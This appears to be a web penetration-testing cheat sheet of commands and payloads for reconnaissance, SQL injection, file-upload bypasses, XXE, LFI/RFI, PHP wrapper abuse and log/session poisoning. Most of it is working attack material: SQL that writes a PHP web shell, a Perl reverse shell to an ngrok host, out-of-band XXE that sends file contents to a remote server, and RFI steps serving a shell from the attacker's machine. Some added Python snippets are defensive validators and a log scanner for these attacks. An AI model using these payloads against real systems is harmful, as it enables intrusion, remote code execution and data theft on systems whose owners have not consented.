Web Cheat Sheet
Server version
To do
- Check for known vulnerabilities
- Get versions, application, services, technologies etc.
- Source code review
- HTTPS --> certificate --> usernames, e-mail addresses, subdomains
- Web Application Firewall (WAF)
Tools
whatweb -a 1 $URL
whatweb -a 3 $URL
whatweb -a 4 $URL
nuclei -ut && nuclei -target http://$IP
nikto --host $URL -C all -o recon/nikto.txt
Content discovery
To do
Do a recursive search (not every tool does this automatically)
See default pages
Use different wordlists
Check every file you found (php, bak, html, py, txt, etc.)
Check for WAF
Default pages
/robots.txt
/sitemap.xml
/crossdomain.xml
/clientaccesspolicy.xml
/.well-known/
Wordlists
###### files and folders
/usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
/usr/share/seclists/Discovery/Web-Content/raft-medium-files.txt
/usr/share/seclists/Discovery/Web-Content/common.txt
/usr/share/seclists/Discovery/Web-Content/big.txt
###### subdomains
/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt
/usr/share/seclists/Discovery/DNS/bug-bounty-program-subdomains-trickest-inventory.txt
/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt
Files and Folders Discovery
feroxbuster -t 10 -u http://$IP -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -x py,html,txt -o enumeration/feroxbuster
dirsearch -u http://$IP -o enumeration/dirsearch
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -u http://$IP -o enumeration/gobuster
wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://$IP/api/FUZZ
Subdomains
gobuster vhost -u http://$IP -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 200
wfuzz -c -f enumeration/subdomains.txt -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hl 7 -t 200 -u "http://$IP" -H "Host: FUZZ.$domain"
Check if any WAF
######################## tools scan ########################
# http-waf-detect (nmap NSE script)
nmap -p 80 --script http-waf-detect $IP
wafw00f $URL
ffuf -c -w "/opt/host/main.txt:FILE" -H "X-Originating-IP: 127.0.0.1, X-Forwarded-For: 127.0.0.1, X-Remote-IP: 127.0.0.1, X-Remote-Addr: 127.0.0.1, X-Client-IP: 127.0.0.1" -fs 5682,0 -u https://target/FUZZ
######################## manual check ############################
# Through telnet, you can identify if there is a WAF
telnet <site/ip> <80/443>
GET / HTTP/1.1
### Ports
# 264 / 18264 --> Checkpoint
# 4443 --> SonicWall / Sophos
# 500/udp --> can be Cisco VPN (IPsec, IIRC)
Common Vulns
IDOR
### Bypass restrictions using parameter pollution
# You can use the same parameter several times
example/profile?UserId=123 # Ok, your profile
example/profile?UserId=456 # ERROR
example/profile?UserId=456&UserId=123 # OK, it can work
### Tips
# - Some encoded/hashed IDs can be predictable --> create several accounts and compare them
# - Try id, user_id, message_id etc. even if the application does not seem to offer them (e.g. on an API)
# - Parameter Pollution (HPP)
# - Switch between POST and PUT to bypass potential controls
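Why the duplicated-parameter trick above works, and how to close it, as an added Python example (not code from the original cheat sheet; the URLs are constructed from the three cases above). The vulnerable function models an authorization check and a data layer that read different occurrences of the same key, which is exactly the disagreement HPP exploits; the hardened one rejects duplicates and binds the decision to the session.

```python
from urllib.parse import urlsplit, parse_qs

# Constructed requests mirroring the three cases above.
OWN     = "https://example/profile?UserId=123"
OTHER   = "https://example/profile?UserId=456"
POLLUTE = "https://example/profile?UserId=456&UserId=123"

def query_values(url, name):
    """Every value sent for `name`, in order (a duplicated key yields several)."""
    return parse_qs(urlsplit(url).query, keep_blank_values=True).get(name, [])

def vulnerable_authorize(url, session_uid):
    """The pattern HPP abuses: the authz check reads one occurrence (here the
    last, as PHP's $_GET does) while the data layer reads another (the first,
    as a Java servlet's getParameter() does). '456&123' passes and fetches 456."""
    values = query_values(url, "UserId")
    if not values or values[-1] != str(session_uid):
        return None                       # the "ERROR" case from the sheet
    return int(values[0])                 # profile actually returned

def hardened_authorize(url, session_uid):
    """Fix: refuse duplicated keys and compare the single value to the session."""
    values = query_values(url, "UserId")
    if len(values) != 1:
        return None                       # parameter pollution -> reject outright
    if values[0] != str(session_uid):
        return None                       # not the caller's own profile
    return int(values[0])
```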
SQLinjections
For specific payloads, see the link above.
#### Upload file ####
union all select 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/inetpub/wwwroot/backdoor.php'
# Passwords
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password),6 FroM users
uNiOn aLl SeleCt 1,2,3,4,conCat(username,0x3a,password,0x3a,flag),6 FroM users
#### Blind SQLi ####
### Boolean Based
'union select 1,2,3,4 where database() like '$database_name%';-- - # brute force the database name character by character (the login succeeds when the prefix is correct) --> e.g. database name = mywebsite --> the login succeeds for "m", "my", "myw" and so on
'union select 1,2,3,4 where database() like binary '$database_name%';-- - # binary makes the comparison case-sensitive
SQLMap
These are commands that I commonly use
# use request file
sqlmap -r request.txt
# show databases
sqlmap --dbs
# dump everything from a DB
sqlmap -D database_name --dump
# show tables of a DB
sqlmap -D database_name --tables
# dump a table
sqlmap -D database_name -T table_name --dump
# choose techniques
sqlmap --technique=BEU # B=boolean-based blind, E=error-based, U=UNION query
# current user
sqlmap --current-user
# database name
sqlmap --current-db
# verbose mode
sqlmap -v 3 # levels from 1 to 6
# user info
sqlmap --privileges --roles --is-dba --hostname
# system commands
sqlmap --os-shell
sqlmap --os-cmd whoami
# SQL queries
sqlmap --sql-shell
# authentication required
sqlmap --auth-type Basic --auth-cred 'admin:admin'
# TOR network
sqlmap --tor
# delay between requests
sqlmap --delay 1 # seconds
# try a specific parameter
sqlmap -p "param_name"
-----------
# Automated SQLMap Scan
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3
File upload
###### Double Extension
# If the target only checks the extension
-> exploit.php.jpg
# Tricks
-> exploit.php\ .jpg
-> exploit.php\#.jpg
# MIME Type
# Classical, using Burp for example
Content-Type: application/x-php → Content-Type: image/gif
# Using cURL
curl -i -F "file=@shell.php;type=image/gif" --cookie "..." "<target>"
# On Windows you can also create or update the following registry key
HKLM\SOFTWARE\Classes\.php
# then create a String value named "Content-Type" and set it to "image/gif"
######################## NULL Byte ########################
→ exploit.php%00.jpg
######################## Zip Upload ########################
# You can read server files through a ZIP upload containing symlinks
ln -s ../../../index.php link
zip --symlinks test.zip link
######################## Wildcard & tar exploit ########################
# If the server runs tar with a wildcard (*) over the uploaded files, you can exploit it by uploading 3 files:
• --checkpoint-action=exec=sh shell.sh
• --checkpoint=1
• shell.sh
# the shell.sh file contains a payload (different exploits are possible):
• cat "path/index.php" > index.txt
• #!/bin/sh
perl -e 'use Socket;$i="0.tcp.ngrok.io";$p=15975;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
• tar cvf admin.tar ../../../admin
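Server-side validation that closes each of the upload tricks above (double extension, null byte, spoofed MIME type, and option-like filenames for the tar wildcard case), as an added Python example rather than code from the original cheat sheet; the images-only policy and the magic-byte table are assumptions.

```python
import os

ALLOWED_EXT = {"jpg", "jpeg", "png", "gif"}          # assumed policy: images only
MAGIC = {                                            # declared type -> real leading bytes
    "image/gif": (b"GIF87a", b"GIF89a"),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
}

def validate_upload(filename, content_type, data):
    """Return (accepted, reason). Each check maps to a trick from the cheat sheet."""
    name = os.path.basename(filename.replace("\\", "/"))
    # NULL byte: exploit.php%00.jpg, whether raw or still URL-encoded
    if "\x00" in name or "%00" in name.lower():
        return False, "null byte in filename"
    # Wildcard/tar trick: a file called "--checkpoint=1" becomes a tar option
    if name.startswith("-"):
        return False, "filename starts with '-'"
    # exploit.php\ .jpg, exploit.php#.jpg and friends: allow only a tame charset
    if not all(c.isalnum() or c in "._-" for c in name):
        return False, "unexpected character in filename"
    parts = name.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing extension"
    # Double extension: every extension after the first dot must be allowed
    bad = [e for e in parts[1:] if e not in ALLOWED_EXT]
    if bad:
        return False, "disallowed extension: " + ".".join(bad)
    # Content-Type is attacker-controlled (Burp/curl): compare with the bytes
    sigs = MAGIC.get(content_type)
    if sigs is None:
        return False, "content type not allowed"
    if not data.startswith(sigs):
        return False, "content does not match declared type"
    # Caveat: a genuine PNG carrying a shell in its IDAT chunks passes this;
    # re-encode images server side and serve uploads from a non-executing path.
    return True, "ok"
```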
######################## PNG IDAT Chunks ########################
https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
https://phil242.wordpress.com/2014/02/23/la-png-qui-se-prenait-pour-du-php/
curl -X POST "http://xxx?page=../upload/ucdn6sCjDxredw1.png&0=readfile" --cookie "<cookie>" -d
XML External Entity (XXE) and XSLT
######################## basic XXE ########################
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=path/index.php" >
]>
# or read a file directly
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd" >
]><title>&xxe;</title>
# XXE via Word:
<!-- word/document.xml -->
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [ <!ENTITY % pe SYSTEM "nc -nlvp 31337"> %pe; ]>
<foo>&external;</foo>
<!-- word/document.xml -->
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "nc -nlvp 31337">
]>
<r>&sp;</r>
#### Out of Band XXE (OOB XXE) ####
# The exploitation will download a remote DTD file
# And then execute entities
# SVG File
<!DOCTYPE svg [
<!ENTITY % file SYSTEM "http://ip_server/file.dtd">
%file;%template;
]>
<svg xmlns="http://www.w3.org/2000/svg">
<text x="10" y="30">Injected : &res;</text>
</svg>
# DTD file
<!ENTITY % secret1 SYSTEM "file:///flag.txt">
<!ENTITY % template "<!ENTITY res SYSTEM 'http://ip_server/?data=%secret1;'>">
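The defensive counterpart to the XXE payloads above: a parser that refuses the DOCTYPE, entity-declaration and external-reference constructs every one of them relies on, using only the standard library's expat bindings. Added Python example, not code from the original cheat sheet; the sample inputs are constructed from the payloads above.

```python
import xml.parsers.expat

class UnsafeXML(ValueError):
    """Raised when the document carries a DTD, entity declaration or external reference."""

def parse_untrusted_xml(data):
    """Parse XML from an untrusted source with all DTD machinery refused.
    Returns [(tag, text), ...] in the order the elements close."""
    parser = xml.parsers.expat.ParserCreate()
    # Never fetch external parameter entities (the remote-DTD / OOB XXE trick)
    parser.SetParamEntityParsing(xml.parsers.expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXML("DOCTYPE not allowed: %s" % name)

    def reject_entity(name, is_param, value, base, sysid, pubid, notation):
        raise UnsafeXML("entity declaration not allowed: %s -> %s" % (name, sysid))

    def reject_external(context, base, sysid, pubid):
        raise UnsafeXML("external entity not allowed: %s" % sysid)

    found, stack = [], []
    parser.StartDoctypeDeclHandler = reject_doctype
    parser.EntityDeclHandler = reject_entity
    parser.ExternalEntityRefHandler = reject_external
    parser.StartElementHandler = lambda tag, attrs: stack.append([tag, []])
    parser.CharacterDataHandler = lambda text: stack and stack[-1][1].append(text)
    parser.EndElementHandler = lambda tag: found.append((tag, "".join(stack.pop()[1]).strip()))
    parser.Parse(data, True)   # exceptions raised in handlers propagate from here
    return found

def is_safe(data):
    """True only if the document parses without tripping any of the checks."""
    try:
        parse_untrusted_xml(data)
        return True
    except (UnsafeXML, xml.parsers.expat.ExpatError):
        return False

# Constructed inputs: the file-read and remote-DTD payloads above, plus a clean SVG
XXE_FILE = b'<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><title>&xxe;</title>'
XXE_OOB = b'<!DOCTYPE svg [ <!ENTITY % file SYSTEM "http://ip_server/file.dtd"> %file; ]><svg/>'
CLEAN = b'<svg xmlns="http://www.w3.org/2000/svg"><text x="10" y="30">hello</text></svg>'
```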
######################## XSLT Injections ########################
# You can execute commands through an external XSL file; first fingerprint the XSLT processor
<br />Version: <xsl:value-of select="system-property('xsl:version')" />
<br />Vendor: <xsl:value-of select="system-property('xsl:vendor')" />
<br />Vendor URL: <xsl:value-of select="system-property('xsl:vendor-url')" />
# Example
<?xml version="1.0" encoding="UTF-8"?>
<html xsl:version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform" xmlns:php="http://php.net/xsl">
<body>
<xsl:value-of select="php:function('readfile','index.php')" />
</body>
</html>
# Look for resource
<xsl:variable name="scana">
implode('<br/>',scandir('.'))
</xsl:variable>
<br />Scan dir 1: <xsl:value-of select="php:function('preg_replace', '/.*/e', $scana, '')" />
Local File Inclusion
Common payloads
I usually do a manual enumeration to see how the website responds to LFI attacks
../../../../etc/passwd
.././.././.././.././etc/passwd
....//....//....//etc/passwd
....\/....\/....\/etc/passwd
/index.php?language=./languages/../../../../etc/passwd #specific path (./languages)
../../../../etc/passwd%00
../../../../etc/passwd%00.png
..\..\..\windows\win.ini
../ --> %2e%2e%2f (url encoding)
?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
/test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/mrrobot.php
/index.php?language=php://filter/read=convert.base64-encode/resource=configure
Useful commands
# avoid the appended .php extension with path truncation by adding ././././
echo -n "non_existing_directory/../../../etc/passwd/" && for i in {1..2048}; do echo -n "./"; done
encoded=$(echo -ne '../../../../../../../../../../../../' | xxd --plain | tr -d '\n' | sed 's/\(..\)/%\1/g')
curl "http://$IP/d1r3c70ry_center/claim/index.php?view=${encoded}%2fetc%2fpasswd"
Fuzzing parameter
ffuf -w /usr/share/seclists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://$IP/index.php?FUZZ=value' -fs 2287 # change response size
Fuzzing for LFI
# Fuzz LFI Payloads
ffuf -w /opt/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://$IP/index.php?language=FUZZ' -fs 2287 # change response size
/usr/share/seclists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt
/usr/share/seclists/Fuzzing/LFI/LFI-Jhaddix.txt
/usr/share/seclists/Discovery/Web-Content/default-web-root-directory-linux.txt
/usr/share/seclists/Discovery/Web-Content/default-web-root-directory-windows.txt
/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt
/usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt
PHP Vulns
PHP Filters
###### Wrappers for files #####
?page=php://filter/read=string.rot13/resource=index
?page=php://filter/convert.iconv.utf-8.utf-16/resource=index
?page=php://filter/convert.base64-encode/resource=index
?page=pHp://FilTer/convert.base64-encode/resource=index
?inc=php://filter/read=convert.base64-encode/resource=config.php
#### Wrappers for commands ####
?page=expect://whoami
?page=data:text/plain;,<?php echo shell_exec($_GET['cmd']);?>
?page=/proc/self/environ&cmd=ls
?file=<?php system($_GET['cmd']); ?>
PHP Session Poisoning
# /var/lib/php/sessions/sess_<PHPSESSID> --> session data stored on Linux
# C:\Windows\Temp\ --> on Windows
# check whether it is vulnerable
http://<SERVER_IP>:<PORT>/index.php?language=en.php
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
# see if the output changes
http://<SERVER_IP>:<PORT>/index.php?language=session_poisoning
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
# exploit the vulnerability
http://<SERVER_IP>:<PORT>/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
Phar Upload
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
# build the phar by running the script above (phar.readonly must be off), then rename it
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
http://<SERVER_IP>:<PORT>/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
PHP Wrappers
# /etc/php/X.Y/apache2/php.ini --> php configuration file for Apache
# /etc/php/X.Y/fpm/php.ini --> php configuration file for Nginx
# data wrapper (requires allow_url_include to be enabled)
curl -s 'http://<SERVER_IP>:<PORT>/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id' | grep uid
# input
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id" | grep uid
# expect
echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep expect
#extension=expect #(if this is set then we can execute commands)
curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
# zip (it is not enabled by default)
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
http://<SERVER_IP>:<PORT>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id
PHP Functions
#### assert() evaluates a string argument as PHP code (string arguments are no longer evaluated as of PHP 8.0) ####
#### Example from a challenge ####
?page=..
Warning : assert() : Assertion "strpos('includes/...php', '..') === false" failed in path/index.php on line 8
#### The request looks like this ####
assert("strpos('includes/' . $_GET['page'] . '.php', '..') === false")
#### If we inject this ####
?page=salade.php','..') || print('tomate') || strpos('oignons
#### The request will look like ####
assert("strpos('/includes/salade.php','..') || print('tomate') || strpos('oignons.php','..') ===false")
#### Then, to exploit ####
?page=salade.php','..') || show_source('.passwd') || strpos('oignons
#### In PHP, regular expressions need delimiter ####
preg_match("recherche","contenu"); # wrong
preg_match("/recherche/","contenu"); # OK
#### preg_replace with the /e modifier executes the replacement as code (the modifier was removed in PHP 7.0) ####
preg_replace("input1search","input2replace","input3content");
preg_replace("/a/e","print(123)","abcd");
preg_replace("/a/e","print_r(scandir('.'))","abcd");
preg_replace("/a/e","file_get_contents('flag.php')","abcd");
#### It is possible to bypass some filters like preg_match by using only non-alphanumeric chars ####
# If the application uses eval() on the user input, the payload will still be executed
# Application code
if(!preg_match('/[a-zA-Z`]/', $_POST['input'])){
    print '<fieldset><legend>Result</legend>';
    eval('print '.$_POST['input'].";");
    print '</fieldset>';
}
#### Exploitation and Bypass ####
# You can encode the payload in octal
→ file_get_contents(".passwd")
→ "\146\151\154\145\137\147\145\164\137\143\157\156\164\145\156\164\163"("\056\160\141\163\163\167\144")
#### You can also use non alphanumeric char (https://github.com/v1ll41n/Und3rCov3r) ####
echo -n “phpinfo();” > tmp.php
php Und3rCov3r.php 1 tmp.php
# It will create an alphax.php file containing the encoded payload
#### You can then for example read file ####
→ readfile(".passwd");
Server Log Poisoning
#/var/log/sshd.log
#/var/log/mail
#/var/log/vsftpd.log
# first check that the log file is readable through the LFI, then inject via the User-Agent header
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A "<?php system($_GET['cmd']); ?>"
http://<SERVER_IP>:<PORT>/index.php?language=/var/log/apache2/access.log&cmd=id
# Read php session parameters
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
# Poison php session with web shell
/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
# RCE through poisoned php session
/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
# Poison Server logs
curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'
# RCE through the poisoned server log
/index.php?language=/var/log/apache2/access.log&cmd=id
Common RFI
# verify if the website is vulnerable to RFI
http://<SERVER_IP>:<PORT>/index.php?language=http://127.0.0.1:80/index.php
# make a payload
echo '<?php system($_GET["cmd"]); ?>' > shell.php
# execute this code with a python web server
sudo python3 -m http.server <LISTENING_PORT>
http://<SERVER_IP>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
# Use a ftp server
sudo python -m pyftpdlib -p 21
http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id
# Use SMB
impacket-smbserver -smb2support share $(pwd) #(SMB server with python)
http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami
# Include PHP Remote Webshell
/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
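The detection side of the LFI payloads, PHP wrappers, log/session poisoning and RFI techniques listed above: a scanner that normalises each request URI (iterative URL decoding, collapsing the `....//` and `....\/` evasions) and tags suspicious requests in Apache combined-format access logs. Added Python example with constructed sample lines; it is not part of the original cheat sheet, and the tag names and the sensitive-file list are assumptions.

```python
import re
from urllib.parse import unquote

# Apache "combined" format; only the named groups are used.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+)'
                    r' [^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
WRAPPERS = ("php://", "expect://", "data:", "zip://", "phar://")
REMOTE = ("http://", "https://", "ftp://", "\\\\")
SENSITIVE = ("/etc/passwd", "win.ini", "/proc/self/environ", "sess_", "access.log")

def canonical(s, rounds=3):
    """URL-decode until stable (catches %2e%2e%2f and double encoding), then
    collapse the '....//' and '....\\/' filter-evasion forms to plain '../'."""
    for _ in range(rounds):
        decoded = unquote(s)
        if decoded == s:
            break
        s = decoded
    return re.sub(r"\.{2,}[\\/]+", "../", s)

def classify(uri, ua):
    """Tags for one request; an empty list means nothing suspicious."""
    query = canonical(uri.partition("?")[2])
    low = query.lower()
    tags = []
    if re.search(r"\.\.[\\/]", query):      tags.append("traversal")
    if "\x00" in query:                     tags.append("null-byte")
    if any(w in low for w in WRAPPERS):     tags.append("php-wrapper")
    if any(w in low for w in REMOTE):       tags.append("remote-include")
    if any(f in low for f in SENSITIVE):    tags.append("sensitive-file")
    if "<?php" in ua.lower() or "<?php" in low:
        tags.append("php-tag")              # log or session poisoning attempt
    return tags

def scan(lines):
    """(ip, uri, tags) for every parseable line that earned at least one tag."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        tags = classify(m["uri"], m["ua"])
        if tags:
            findings.append((m["ip"], m["uri"], tags))
    return findings

# Constructed sample log lines mirroring the payloads on this page
SAMPLE = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?language=en HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?language=....//....//etc/passwd HTTP/1.1" 200 2287 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?language=%252e%252e%252fetc%252fpasswd%00.png HTTP/1.1" 200 2287 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?language=php://filter/convert.base64-encode/resource=config.php HTTP/1.1" 200 900 "-" "curl/8.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "<?php system($_GET[\'cmd\']); ?>"',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=http://198.51.100.7:8000/shell.php&cmd=id HTTP/1.1" 200 77 "-" "curl/8.0"',
]
```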